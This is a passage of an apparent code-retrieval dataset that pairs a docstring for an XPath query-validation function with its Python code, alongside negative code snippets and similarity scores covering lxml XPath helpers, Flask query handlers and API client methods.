project_dto, 200\n else:\n return {\n \"Error\": \"User not permitted: Private Project\",\n \"SubCode\": \"PrivateProject\",\n }, 403\n except ProjectServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 403\n finally:\n # this will try to unlock tasks that have been locked too long\n try:\n ProjectService.auto_unlock_tasks(project_id)\n except Exception as e:\n current_app.logger.critical(str(e))", "async def get_invalid(self, **kwargs: Any) -> bool:\n error_map = {\n 401: ClientAuthenticationError,\n 404: ResourceNotFoundError,\n 409: ResourceExistsError,\n 304: ResourceNotModifiedError,\n }\n error_map.update(kwargs.pop(\"error_map\", {}) or {})\n\n _headers = kwargs.pop(\"headers\", {}) or {}\n _params = kwargs.pop(\"params\", {}) or {}\n\n cls: ClsType[bool] = kwargs.pop(\"cls\", None)\n\n request = build_bool_get_invalid_request(\n headers=_headers,\n params=_params,\n )\n request.url = self._client.format_url(request.url)\n\n _stream = False\n pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access\n request, stream=_stream, **kwargs\n )\n\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n if _stream:\n await response.read() # Load the body in memory and close the socket\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response)\n\n if response.content:\n deserialized = response.json()\n else:\n deserialized = None\n\n if cls:\n return cls(pipeline_response, cast(bool, deserialized), {})\n\n return cast(bool, deserialized)", "def _GetResponseObject200(\n self,\n result_type: Union[rdf_structs.RDFProtoStruct, str],\n router_method_name: str,\n ) -> Dict[str, Union[str, Dict[str, Any]]]:\n resp_success_obj: Dict[str, Union[str, Dict[str, Any]]] = dict()\n\n if result_type:\n if (isinstance(result_type, type) and\n issubclass(result_type, rdf_structs.RDFProtoStruct)):\n result_type_name = _GetTypeName(\n cast(rdf_structs.RDFProtoStruct, result_type).protobuf.DESCRIPTOR)\n else:\n result_type_name = _GetTypeName(result_type)\n\n resp_success_obj[\"description\"] = (\n f\"The call to the {router_method_name} API method succeeded and it \"\n f\"returned an instance of {result_type_name}.\")\n\n media_obj = {\"schema\": _GetReferenceObject(result_type_name)}\n\n content = dict() # Needed to please mypy.\n if result_type == \"BinaryStream\":\n content[\"application/octet-stream\"] = media_obj\n else:\n content[\"application/json\"] = media_obj\n resp_success_obj[\"content\"] = content\n else:\n resp_success_obj[\"description\"] = (\n f\"The call to the {router_method_name} API method succeeded.\")\n\n return resp_success_obj", "def test_returns_easy_projects_if_difficulty_set_to_easy(self):\n # Arrange\n self.test_project_2.private = False\n # Set difficulty of test_project_2 to easy.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n self.test_project_2.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"EASY\"},\n )\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_2.id\n )", "async def get_valid(self, **kwargs: Any) -> JSON:\n error_map = {\n 401: ClientAuthenticationError,\n 404: ResourceNotFoundError,\n 409: ResourceExistsError,\n 304: ResourceNotModifiedError,\n }\n error_map.update(kwargs.pop(\"error_map\", {}) or {})\n\n _headers = kwargs.pop(\"headers\", {}) or {}\n _params = kwargs.pop(\"params\", {}) or {}\n\n cls: ClsType[JSON] = kwargs.pop(\"cls\", None)\n\n request = build_inheritance_get_valid_request(\n headers=_headers,\n params=_params,\n )\n request.url = self._client.format_url(request.url)\n\n _stream = False\n pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access\n request, stream=_stream, **kwargs\n )\n\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n if _stream:\n await response.read() # Load the body in memory and close the socket\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n raise HttpResponseError(response=response)\n\n if response.content:\n deserialized = response.json()\n else:\n deserialized = None\n\n if cls:\n return cls(pipeline_response, cast(JSON, deserialized), {})\n\n return cast(JSON, deserialized)" ]
[ "0.64074504", "0.584251", "0.57444906", "0.5642053", "0.55687165", "0.55578846", "0.5441781", "0.54382634", "0.5401079", "0.5363507", "0.53115785", "0.53091395", "0.5285356", "0.52749294", "0.52570665", "0.52514297", "0.52415955", "0.5230785", "0.5206412", "0.52010256", "0.514516", "0.51304245", "0.51076394", "0.5105563", "0.5096675", "0.5089765", "0.50774765", "0.5075774", "0.5071232", "0.5068705" ]
0.80576724
0
Function to check for XPath validity. Tries to create an etree ETXPath instance from the query. If this fails, the XPathSyntaxError is excepted to return a False. Returns True otherwise
def is_valid_query(query): try: etree.ETXPath(query) return True except etree.XPathSyntaxError: return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def do_xpath(xpath, etree):\n try:\n return etree.xpath(xpath)\n except (lxml.etree.XPathSyntaxError, lxml.etree.XPathEvalError):\n raise InvalidXPathExpression(sys.exc_info()[:2], value=xpath)", "def compile_xpath(xpath, key=None):\n try:\n return lxml.etree.XPath(xpath)\n except lxml.etree.XPathSyntaxError:\n raise InvalidXPathExpression(sys.exc_info()[:2], value=xpath, key=key)", "def check_exists_by_xpath(self, xpath):\n try:\n self.driver.find_element_by_xpath(xpath)\n except NoSuchElementException:\n return False\n return True", "def test_locationFooBar(self):\n xp = XPathQuery(\"/foo/bar\")\n self.assertEqual(xp.matches(self.e), 1)", "def test_anyLocationQueryForString(self):\n xp = XPathQuery(\"//bar\")\n self.assertRaises(NotImplementedError, xp.queryForString, None)", "def _does_webelement_with_xpath_exist(self, xpath, timeout=60):\n return self._search_element(By.XPATH, xpath, timeout=timeout)", "def test_locationNoBar3(self):\n xp = XPathQuery(\"/foo/bar3\")\n self.assertEqual(xp.matches(self.e), 0)", "def test_predicate6(self):\n xpb = XPathBuilder()\n xp = xpb.foobar.where(2)\n exp = '/foobar[2]'\n self.assertEqual(xp.tostring(), exp)", "def test_predicate5(self):\n xpb = XPathBuilder()\n xp = xpb.foobar[2]\n exp = '/foobar[2]'\n self.assertEqual(xp.tostring(), exp)", "def test_badXPathNoClosingBracket(self):\n exc = self.assertRaises(SyntaxError, XPathQuery, \"\"\"//bar[@attrib1\"\"\")\n self.assertTrue(exc.msg.startswith(\"Trying to find one of\"),\n (\"SyntaxError message '%s' doesn't start with \"\n \"'Trying to find one of'\") % exc.msg)", "def validate_etree(self, etree_xml):\n valid = self.xml_schema.validate(etree_xml)\n return SchemaValidationResult(valid, self.xml_schema.error_log)", "def xpathTrueFunction(self, nargs):\n libxml2mod.xmlXPathTrueFunction(self._o, nargs)", "def validate(self) :\n\t\tif self.doc is not None :\n\t\t\tparser = etree.XMLParser(recover=True, strip_cdata=True)\n\t\t\ttree = etree.XML(self.doc.toxml(), parser)\n\t\t\tdtdFile = self._getDTDFile()\n\t\t\tif dtdFile is not None :\n\t\t\t\tif _existFile(dtdFile) :\n\t\t\t\t\tdtd = etree.DTD(dtdFile)\n\t\t\t\t\tif dtd.validate(tree) :\n\t\t\t\t\t\tself._enrichXML()\n\t\t\t\t\t\treturn True\n\t\t\t\t\telse :\n\t\t\t\t\t\tprint(dtd.error_log.filter_from_errors()[0])\n\t\t\t\t\t\treturn False\n\t\t\t\telse :\n\t\t\t\t\tprint('Unable to find the DTD file ',dtdFile)\n\t\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tself._enrichXML()\n\t\t\t\treturn True\n\t\telse :\n\t\t\treturn False", "def SyntaxChecker_isValidXMLanyURI(*args):\n return _libsbml.SyntaxChecker_isValidXMLanyURI(*args)", "def apply_xpath(xpath, etree, key=None):\n try:\n return xpath(etree)\n except lxml.etree.XPathEvalError:\n raise InvalidXPathExpression(sys.exc_info()[:2], value=xpath, key=key)", "def is_element_present_by_xpath(self, x_path, timeout=10):\n try:\n wait = WebDriverWait(self.web_driver, timeout)\n wait.until(lambda driver: self.web_driver.find_element(By.XPATH, x_path))\n return True\n except TimeoutException:\n return False", "def test_pathop1(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar & xpb.bar.foo\n exp = '/foo/bar and /bar/foo'\n self.assertEqual(xp.tostring(), exp)", "def isValidXMLanyURI(*args):\n return _libsbml.SyntaxChecker_isValidXMLanyURI(*args)", "def test_predicate7(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar[(xpb.attr('name') == 'foo') & (xpb.attr('x') == 'x')]\n exp = '/foo/bar[@name = \"foo\" and @x = \"x\"]'\n self.assertEqual(xp.tostring(), exp)", "def hasExpectedXHTMLSyntax(*args):\n return _libsbml.SyntaxChecker_hasExpectedXHTMLSyntax(*args)", "def xpathErr(self, error):\n libxml2mod.xmlXPathErr(self._o, error)", "def assert_has_xpath(self, xml_root, xpath, context_dict, exact_num=1):\r\n message = (\"XML does not have %d match(es) for xpath '%s'\\nXML: %s\\nContext: %s\"\r\n % (exact_num, str(xpath), etree.tostring(xml_root), str(context_dict)))\r\n\r\n self.assertEqual(len(xml_root.xpath(xpath)), exact_num, msg=message)", "def xpath_returns_text(xpath_expr, xpath_as_str_re=XPATH_AS_STR_RE):\n return bool(xpath_as_str_re.search(xpath_expr))", "def xpathEvalExpr(self):\n libxml2mod.xmlXPathEvalExpr(self._o)", "def test_pathop12(self):\n xpb = XPathBuilder()\n # braces not needed\n xp = xpb.foo & (xpb.bar.foo).parenthesize() | xpb.foobar\n exp = '/foo and (/bar/foo) or /foobar'\n self.assertEqual(xp.tostring(), exp)", "def test_path9(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar == xpb.foobar\n exp = '/foo/bar = /foobar'\n self.assertEqual(xp.tostring(), exp)", "def test_exception1(self):\n xpb = XPathBuilder()\n pred = xpb.attr('foo') == 'bar'\n path = xpb.foo.bar\n pred_expr = path[pred]\n self.assertEqual(pred_expr.tostring(), '/foo/bar[@foo = \"bar\"]')\n pred.reparent(None)\n self.assertRaises(XPathSyntaxError, pred_expr.tostring)", "def test_pathop6(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar.log_not()\n exp = 'not(/foo/bar)'\n self.assertEqual(xp.tostring(), exp)", "def test_queryForString(self):\n xp = XPathQuery(\"/foo\")\n self.assertEqual(xp.queryForString(self.e), \"somecontent\")", "def is_xpath_locator(locator_string: str) -> bool:\n if locator_string.startswith(\"/\"):\n return True\n return False" ]
[ "0.6174968", "0.5611842", "0.54611474", "0.5443031", "0.54190075", "0.54012316", "0.5400232", "0.5372852", "0.5365433", "0.53124905", "0.5279214", "0.5277152", "0.52084434", "0.5196005", "0.5166062", "0.5154404", "0.51458836", "0.51294345", "0.5126877", "0.5125673", "0.50833386", "0.5069324", "0.50518167", "0.5051435", "0.5043804", "0.50251776", "0.50157225", "0.50105214", "0.5008219", "0.5001242" ]
0.74816614
0
First checks if the request is a simple dictionary with string keys and string values. If so, the queries in the request message are saved to disk
def process_queries(req, save_dir, replace_allowed): create_dir_if_not_exists(save_dir) req_obj = json.loads(req.data) result_dict = dict() if not all(map(lambda x: all(map(lambda y: isinstance(y, str), x)), req_obj.items())): return {"message": f"Not all query names or values are strings"}, 400 for query_name, query_value in req_obj.items(): exists = os.path.exists(os.path.join(save_dir, query_name)) if not is_valid_query(query_value): result_dict[query_name] = "invalid XPath expression" elif not replace_allowed and exists: result_dict[query_name] = "not created: already exists" elif replace_allowed and not exists: result_dict[query_name] = "not replaced: does not exist" else: with open(os.path.join(save_dir, query_name), 'w') as f: f.write(query_value) result_dict[query_name] = "replaced" if replace_allowed else "created" if len(os.listdir(save_dir)) == 0: os.rmdir(save_dir) return result_dict, 200
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def save_request(self, request):\n request_dict = self.process_request(request)\n self.ser.info(pickle.dumps(request_dict))\n self.ser.info(REQUEST_UNIQUE_STRING)", "def test_query_dict_for_request_in_method_post(self):\n self.request.POST = QueryDict(\"foo=bar\")\n response = self.panel.process_request(self.request)\n self.panel.generate_stats(self.request, response)\n # ensure the panel POST request data is processed correctly.\n content = self.panel.content\n self.assertIn(\"foo\", content)\n self.assertIn(\"bar\", content)", "def request(query):", "def _prepare_payload(self):\n\n requests_json = []\n for qry in self._current_query.queries:\n request = qry.build_request()\n requests_json.append(self._serialize_request(request, len(requests_json)))\n\n return {\"requests\": requests_json}", "def test_input_dict(self):\n self.app.app.preprocess_request()\n\n input_dict = {'foo': 'bar'}\n\n resp = self.r(input_dict)\n\n self.assertIsInstance(\n resp, werkzeug.wrappers.Response\n )\n\n self.assertIn(\n 'foo:bar',\n resp.data.decode()\n )", "def _handle_request(data):\n global puts_so_far\n global gets_so_far\n global query_times\n # Format of requesttuple: ('PUT'/'GET', key, value, TTLval\n requesttuple = serialize.serialize_deserializedata(data)\n\n if requesttuple[0] == 'PUT':\n puts_so_far += 1\n\n ############# START Tons of type checking\n try:\n (key, value, ttlval) = requesttuple[1:]\n except ValueError, e:\n _log_with_timestamp(' > ERROR: Incorrect format for request tuple: ' + str(requesttuple) + \"\\n\")\n return\n\n if type(key) is not str:\n _log_with_timestamp(' > ERROR: Key type for PUT must be str, not' + str(type(key)) + \"\\n\")\n return\n\n if type(value) is not str:\n _log_with_timestamp(' > ERROR: Value type must be str, not' + str(type(value)) + \"\\n\")\n return\n\n if type(ttlval) is not int and type(ttlval) is not long:\n _log_with_timestamp(' > ERROR: TTL type must be int or long, not' + str(type(ttlval)) + \"\\n\")\n return\n\n if ttlval <=0:\n _log_with_timestamp(' > ERROR: TTL must be positive, not ' + str(ttlval) + \"\\n\")\n return\n ############# END Tons of type checking\n\n _insert_item(key, value, ttlval)\n _insert_item('%all', value, ttlval)\n\n return serialize.serialize_serializedata(\"OK\")\n\n elif requesttuple[0] == 'GET':\n gets_so_far += 1\n\n ############# START Tons of type checking (similar to above\n try:\n (key, maxvals) = requesttuple[1:]\n except ValueError, e:\n log(' > ERROR: Incorrect format for request tuple: ' + str(requesttuple) + \"\\n\")\n return\n\n if type(key) is not str:\n log(' > ERROR: Key type for GET must be str, not' + str(type(key)) + \"\\n\")\n return\n\n if type(maxvals) is not int and type(maxvals) is not long:\n log(' > ERROR: Maximum value type must be int or long, not' + str(type(maxvals)) + \"\\n\")\n return\n\n if maxvals <=0:\n log(' > ERROR: maxvals; Value type must be positive, not ' + str(maxvals) + \"\\n\")\n return\n\n ############# END Tons of type checking\n\n readlist = []\n entries = _read_item(key, maxvals)\n\n for entry in entries:\n readlist.append(entry)\n\n return serialize.serialize_serializedata((\"OK\", readlist))\n\n return", "def serialize_request(self, request):\n raise NotImplementedError()", "def validatePayload(q, request):\r\n\t\tassert type(q) is str\r\n\t\t# Queries with subtitutions must have the format {var.type} for input validation purposes.\r\n\t\tformatType = Validator.getFormatType(request)\r\n\t\tif formatType == 'str':\r\n\t\t\titems = request.args.items()\r\n\t\t\tpayload = {}\r\n\t\t\t[payload.update({item[0]: item[1]}) for item in items]\r\n\t\telif formatType == 'json':\r\n\t\t\tpayload = request.get_json()\r\n\t\t\tpayload = json.loads(payload) if payload else None\r\n\t\telif formatType == 'urlencoded':\r\n\t\t\tpayload = {item:request.form[item] for item in request.form}\r\n\t\t\tif payload is None:\r\n\t\t\t\titems = request.args.items()\r\n\t\t\t\tpayload = {}\r\n\t\t\t\t[payload.update({item[0]: item[1]}) for item in items]\r\n\t\tnewQuery, expectedParamsAndTypes = Validator.extractQueryParams(q)\r\n\t\tpayload = Validator.validateJsonRequestParams(payload, expectedParamsAndTypes, formatType)\r\n\t\treturn (payload, newQuery)", "def test_dict_for_request_in_method_post(self):\n self.request.POST = {\"foo\": \"bar\"}\n response = self.panel.process_request(self.request)\n self.panel.generate_stats(self.request, response)\n # ensure the panel POST request data is processed correctly.\n content = self.panel.content\n self.assertIn(\"foo\", content)\n self.assertIn(\"bar\", content)", "def buildCheckRequestToDict(self, uID, request, firstname, lastname):\n result = {}\n result['uID'] = uID\n result['request'] = request\n result['firstname'] = firstname\n result['lastname'] = lastname\n return result", "def save_data():\n\tdata = dict(request.args)\n\n\treturn jsonify(result={\"status\": 200})", "def handle_request_payload(self, input_args):\n\n if self.resource['operation'] == PyMongoEvent.INSERT_MANY:\n add_data_if_needed(self.resource['metadata'], 'Items',\n input_args[0])\n\n elif self.resource['operation'] == PyMongoEvent.INSERT_ONE:\n add_data_if_needed(self.resource['metadata'], 'Item',\n input_args[0])\n\n elif self.resource['operation'] in PyMongoEvent.FILTER_OPERATIONS:\n add_data_if_needed(self.resource['metadata'], 'Filter',\n input_args[0])\n\n if self.resource['operation'] == 'update_one':\n add_data_if_needed(self.resource['metadata'], 'New Values',\n input_args[1])", "def test_query_dict_for_request_in_method_get(self):\n self.request.GET = QueryDict(\"foo=bar\")\n response = self.panel.process_request(self.request)\n self.panel.generate_stats(self.request, response)\n # ensure the panel GET request data is processed correctly.\n content = self.panel.content\n self.assertIn(\"foo\", content)\n self.assertIn(\"bar\", content)", "def execute(self, req):\n\t\tmyPath = req[\"url\"].replace(self.settings[\"ns\"][\"local\"], \"\", 1).split(\"/\")\n\t\tfile = myPath.pop(0)\n\t\tcurrentDir = getcwd()\n\t\tservice = self.basedir + file\n\t\turi = req[\"url\"]\n\t\tqueryPath = \"%s/queries/\" % service\n\t\ttemplatePath = \"%s/\" % service\n\t\ttemplateName = self.mime.getExtension(req[\"request\"].accept_mimetypes.best)\n\t\ttry:\n\t\t\tonlyfiles = [f for f in listdir(queryPath) if isfile(join(queryPath, f))]\n\t\texcept OSError:\n\t\t\tprint \"Warning: Can't find path %s for queries.\" % templatePath\n\t\t\tonlyfiles = []\n\t\tqueries = {}\n\t\tfirst={}\n\t\tfor root, dirs, files in walk(queryPath):\n\t\t\tfor filename in files:\n\t\t\t\ttry:\n\t\t\t\t\tcurrentEndpoint = \"local\"\n\t\t\t\t\t_aux = root.rstrip(\"/\").split(\"/\").pop()\n\t\t\t\t\tif _aux != \"queries\":\n\t\t\t\t\t\tcurrentEndpoint = _aux\n\t\t\t\t\tif not filename.endswith(\".query\"):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tsqlQuery = self.env.get_template(\"%s/%s\" % (root, filename))\n\t\t\t\t\trenderedSqlQuery = sqlQuery.render(queries=queries, first=first, uri=uri, session=session, flod=self.flod, args=myPath)\n\t\t\t\t\tif re.match(\"^\\s*select\", renderedSqlQuery, flags=re.IGNORECASE) is None:\n\t\t\t\t\t\treturn {\"content\": \"Not a valid SQL Select query\", \"status\": 500}\n\t\t\t\t\tresults = self.sqlserver.query(renderedSqlQuery, currentEndpoint)\n\t\t\t\t\t_name = filename.replace(\".query\", \"\")\n\t\t\t\t\tqueries[_name] = []\n\t\t\t\t\tif results is not None:\n\t\t\t\t\t\tqueries[_name] = results\n\n\t\t\t\texcept Exception, ex:\n\t\t\t\t\tprint sys.exc_info()\n\t\t\t\t\tprint ex\n\t\t\t\t\treturn {\"content\": \"A problem with the SQL endpoint occurred\", \"status\": 500}\n\t\tchdir(currentDir)\n\t\ttry:\n\t\t\tif templateName == \"json\" and not isfile( \"%s%s.template\" % (templatePath, templateName)):\n\t\t\t\tout = json.dumps(queries)\n\t\t\telse:\n\t\t\t\tcontent = self.env.get_template(\"%s%s.template\" % (templatePath, templateName))\n\t\t\t\tout = content.render(queries=queries, uri=uri, session=session, flod=self.flod, args=myPath)\n\t\texcept Exception:\n\t\t\tprint sys.exc_info()\n\t\t\treturn {\"content\": \"Rendering problems\" , \"status\": 500}\n\t\treturn {\"content\": out, \"mimetype\": \"text/html\"}", "def handleQuery(self, query) -> None: # noqa\n results = []\n\n try:\n query_str = query.string.strip()\n\n # too small request - don't even send it.\n if len(query_str) < 2:\n keys_monitor.reset()\n return\n\n if len(query_str.split()) > 1:\n # pydictionary or synonyms.com don't seem to support this\n query.add(\n v0.Item(\n id=md_name,\n icon=[icon_path],\n text=\"A term must be only a single word\",\n actions=[],\n )\n )\n return\n\n # determine if we can make the request --------------------------------------------\n keys_monitor.report()\n if keys_monitor.triggered():\n results.extend(get_items_for_word(query, query_str))\n\n if not results:\n query.add(\n 0,\n v0.Item(\n id=md_name,\n icon=[icon_path],\n text=\"No results.\",\n actions=[],\n ),\n )\n\n return\n else:\n query.add(results)\n\n except Exception: # user to report error\n print(traceback.format_exc())\n query.add(\n v0.Item(\n id=md_name,\n icon=[icon_path],\n text=\"Something went wrong! Press [ENTER] to copy error and report it\",\n actions=[\n ClipAction(\n f\"Copy error - report it to {md_url[8:]}\",\n f\"{traceback.format_exc()}\",\n )\n ],\n ),\n )", "def get_request(req: Dict) -> Dict:\n for field in ['body']:\n if field in req:\n data = req[field]\n if isinstance(data, str):\n return create_request(data)\n elif isinstance(data, dict) and 'text' in data:\n return data\n return None", "def _parse_in_request(self, request):\n error = None\n self.logger.debug(\"Http method: %s\" % request.method)\n if request.method == 'GET':\n self._params = request.args.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)\n \n elif request.method == 'POST':\n self._params = request.form.to_dict()\n self.logger.debug(\"Request params: %s\" % self._params)", "def query_request():\n query_data = request.get_json()\n print(query_data)\n example_response = []\n \n # First we need to check if the request is for table or time series data\n if query_data and query_data == 'table':\n # send back columns and rows\n pass\n elif query_data:\n # send back value/clock pairs for timeseries charts\n example_response = generate_fake_timeseries(query_data.get('range', {}).get('from'),\n query_data.get('range', {}).get('to'),\n interval=query_data.get('intervalMs', 60000),\n create=4)\n return make_response(jsonify(example_response))", "def test_valid_analysis_request(analysis_request_dict: JSONDict) -> None:\n\n request = AnalysisRequest(**analysis_request_dict)\n\n assert request.dict() == analysis_request_dict", "def export_updateRequest(self,requestName,requestString):\n gLogger.info(\"RequestManagerHandler.updateRequest: Attempting to update %s.\" % requestName)\n try:\n res = requestDB.updateRequest(requestName,requestString)\n return res\n except Exception,x:\n errStr = \"RequestManagerHandler.updateRequest: Exception which updating request.\"\n gLogger.exception(errStr,requestName,lException=x)\n return S_ERROR(errStr)", "def handle(req):\n msg = json.loads(req)\n msg['data'] = {key: value for key, value in msg['data'].items()\n if key not in keys}\n return json.dumps(msg)", "def query(\n self,\n woql_query: Union[dict, WOQLQuery],\n commit_msg: Optional[str] = None,\n file_dict: Optional[dict] = None,\n ) -> Union[dict, str]:\n self._check_connection()\n query_obj = self._generate_commit(commit_msg)\n if isinstance(woql_query, WOQLQuery):\n request_woql_query = woql_query.to_dict()\n else:\n request_woql_query = woql_query\n request_woql_query[\"@context\"] = self._context\n query_obj[\"query\"] = request_woql_query\n # request_file_dict: Optional[Dict[str, Tuple[str, Union[str, BinaryIO], str]]]\n if file_dict is not None and type(file_dict) is dict:\n request_file_dict = {}\n for name in query_obj:\n query_obj_value = query_obj[name]\n request_file_dict[name] = (\n name,\n json.dumps(query_obj_value),\n \"application/json\",\n )\n file_list = []\n for name in file_dict:\n file_list.append(os.path.join(file_dict[name], name))\n # path = file_dict[name]\n # request_file_dict[name] = (name, open(path, \"rb\"), \"application/binary\")\n payload = None\n else:\n file_list = None\n payload = query_obj\n\n result = self._dispatch_json(\n \"post\",\n self._query_url(),\n payload,\n file_list,\n )\n if result.get(\"inserts\") or result.get(\"deletes\"):\n return \"Commit successfully made.\"\n return result", "def render_POST(self, request, query=None):\n # make a parser and parse the request\n parser = qp.QueryParser(request)\n if not query: query = request.content.read() \n try: \n # run the query locally\n d = parser.runquery(self.db, query)\n except Exception, e:\n log.err(\"Failing query: \" + str(query))\n log.err()\n setResponseCode(request, e, 400)\n return str(e)\n else:\n # and send the reply\n request.setHeader('Content-type', 'application/json')\n\n if not query.strip().startswith('apply'):\n # apply streams the output out itself\n d.addCallback(lambda reply: (request, reply))\n d.addCallback(self.send_reply)\n d.addErrback(lambda x: self.send_error(request, x))\n return server.NOT_DONE_YET", "def to_simple(self, request, data, many=False, **kwargs):\n schema = self.get_schema(request, **kwargs)\n return schema.dump(data, many=many).data if schema else data", "def handle_request(self, given_request: Request):\n with open(request.output, mode=\"w\", encoding='utf-8') as file:\n file.write(request.result)\n return True", "def request_data():\n if request.method in ('POST', \"PUT\"):\n return request.get_json(force=True)\n else:\n return request.values", "def parse_query(request):\n\n querystring = request.uri['query']\n fp = StringIO(querystring)\n\n headers = {}\n headers['content-type'] = request.message.get('content-type')\n headers['content-length'] = request.message.get('content-length')\n\n environ = {}\n environ['REQUEST_METHOD'] = request.method\n\n boundary = request.message.get('boundary')\n\n query = cgi.FieldStorage( fp = fp\n , headers = headers\n , outerboundary = boundary\n , environ = environ\n , keep_blank_values = True\n , strict_parsing = False\n )\n\n return query", "def handle_log_output(original_parameters_string: Optional[Any]) -> Dict[str, Any]:\n if original_parameters_string is None:\n return {}\n\n if isinstance(original_parameters_string, bytes):\n mystr = original_parameters_string.decode(\"utf-8\")\n elif isinstance(original_parameters_string, str):\n mystr = original_parameters_string\n else:\n mystr = str(original_parameters_string)\n\n if mystr.strip() == \"\":\n return {}\n\n urlencoded = False\n try:\n parameters = orjson.loads(mystr)\n except orjson.JSONDecodeError:\n try:\n parameters = urllib.parse.parse_qs(mystr)\n urlencoded = True\n except Exception: # pragma: no cover\n return original_parameters_string\n\n return obfuscate_dict(parameters, urlencoded=urlencoded)", "def post(self, request):\n # data = dict(request.query_params.items())\n validation_details = self._validate_keywords_extraction_params(\n request.data\n )\n if not validation_details['status']:\n return Response(\n validation_details['error_data'],\n status=status.HTTP_400_BAD_REQUEST\n )\n params = validation_details['params']\n doc = params['document']\n args = (doc, params['max_grams']) if params['max_grams'] else (doc,)\n key_ngrams = get_key_ngrams(\n *args,\n include_numbers=params.get('include_numbers', False)\n )\n return Response(key_ngrams)", "def test_save_request(self):\n\n entry = RequestEntry.objects.filter(path='/test_urn/')\n self.assertEqual(entry.count(), 0)\n self.client.get('/test_urn/')\n self.assertEqual(entry.count(), 1)" ]
[ "0.5780125", "0.561636", "0.551793", "0.54183286", "0.51633644", "0.51528674", "0.5141749", "0.5132121", "0.5078204", "0.50738424", "0.5060169", "0.5056697", "0.50541925", "0.50471795", "0.5036605", "0.50358754", "0.50194955", "0.500363", "0.49596575", "0.4937282", "0.49279454", "0.49206468", "0.49101698", "0.4902082", "0.49003977", "0.4895568", "0.48807725", "0.4854531", "0.48343998", "0.48301384" ]
0.64579356
0
Returns a query result dictionary, given an ACE Record instance and a dictionary of the XPath queries that need to be executed on this record.
def query_dict_for_record(record, touched_queries): result = dict() if len(touched_queries) > 0: parsed_record = etree.parse(StringIO(record.test_data_xml())) result.update(dict((q_name, {'query': q_value, 'result': list(x.text for x in etree.ETXPath(q_value)(parsed_record))}) for q_name, q_value in touched_queries.items())) return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def execute_records_query(query):\n result, hits, output = execute_basic(TYPE_RECORD, query)\n for rec in hits.get('hits', []):\n record = rec.get('_source')\n record['score'] = rec.get('_score')\n record['text'] = rec.get('highlight', {}).get('text')\n output['results'].append(record)\n return output", "def _evaluate(self):\n if not self._evaluated:\n query = { 'query' : self._query.serialize() }\n if self._min_score is not None:\n query['min_score'] = self._min_score\n if self._highlight is not None:\n query['highlight'] = self._highlight\n if self._order is not None:\n query['sort'] = self._order\n\n params = {}\n if self._offset is not None:\n params['from'] = int(self._offset)\n if self._limit is not None:\n params['size'] = int(self._limit)\n if self._only_fields:\n params['fields'] = \",\".join(self._only_fields)\n\n self._results = self._document._meta.search_engine.search(\n query,\n **params\n )\n self._evaluated = True\n\n return self._results", "def perform_queries(records, project_type, project, msgflow):\n all_queries = subdirs_file_content_to_dict(os.path.join(data_dir, project_type, project, msgflow),\n split_by_line=False, subdict_by_path=True)\n result = list({'from': {'node': record.source_node, 'terminal': record.source_terminal},\n 'to': {'node': record.target_node, 'terminal': record.target_terminal},\n 'queries': query_dict_for_record(record,\n all_queries.get(record.source_node, dict()).get(\n record.source_terminal, dict()) |\n all_queries.get(record.target_node, dict()).get(\n record.target_terminal, dict()))}\n for record in records)\n return result", "def query(self, page) -> [str, dict]:", "def query(self):\n return {\n 'name': self.NAME,\n 'statistics_queries': self._statistics_queries\n }", "def query(self) -> dict:\n raise NotImplementedError()", "def query(self, q):\n for key in self.metadb.query(q):\n yield key, self.datadb[key]", "def do_search(arg):\n result = {'count': 0, 'time': 0, 'records': []}\n try:\n uri, q, k, m = arg\n dqp = Pyro.core.getProxyForURI(uri)\n scoresLen,results,indocids,exdocids = dqp.search(q, k, m)\n result=(scoresLen,results,indocids,exdocids)\n except Exception as e:\n print \"Exception:\", e\n return result", "def fetch_querydict(self):\n query = dict()\n query[\"filtered\"] = dict()\n if self.q_dict and isinstance(self.q_dict, dict):\n query_list, filter_list = self.build_query_structure()\n if query_list:\n query[\"filtered\"][\"query\"] = {\"bool\": {\"must\": query_list}}\n if filter_list:\n query[\"filtered\"][\"filter\"] = {\"bool\": {\"must\": filter_list}}\n return query", "def query(self,\n query: str,\n datatype: str = \"response\",\n page: int = 0,\n indices: str = \"\") -> dict:\n endpoint = \"/api/responses/\"\n if datatype == \"cert\":\n endpoint = \"/api/certs/\"\n elif datatype == \"domain\":\n endpoint = \"/api/domains/\"\n ret = self._request(\n endpoint=endpoint,\n params={\n \"q\": query,\n \"indices\": indices,\n \"start\": page * 20,\n },\n )\n return ret", "def __get_results(self, query):\n return self.mysql.query_multi_with_fetchall_as_dict(query)", "def Result(row, schema):\r\n return dict(zip(schema.fields(), row))", "def _get_queried_pts(self):\n queries = {}\n for f_name in self.f_names:\n queries[f_name] = np.asarray([qi.pt\n for qi in self.query_history[f_name]])\n return queries", "def prepare_queries(self):\n self.log.info(\"preparing queries ...\")\n self.prepared_queries = {}\n self.prepared_query_to_str = {}\n initNs = {\"rdfs\": RDFApi.RDFS}\n get_classes = \"\"\"\n SELECT ?class\n WHERE {\n ?class rdf:type rdfs:Class .\n }\n \"\"\"\n 